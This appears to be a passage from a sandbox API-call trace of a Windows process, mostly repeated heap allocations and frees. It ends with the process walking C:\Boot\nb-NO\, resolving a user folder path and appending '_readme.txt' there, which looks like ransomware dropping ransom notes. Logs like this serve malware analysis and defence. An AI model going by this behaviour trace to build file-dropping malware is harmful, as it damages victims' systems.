0x37a2b08 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.022] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0228.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.022] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.022] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.022] PathFindFileNameW (pszPath="") returned="" [0228.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.022] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.023] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.023] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0228.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.023] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a2b08 [0228.024] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0228.024] RtlAllocateHeap 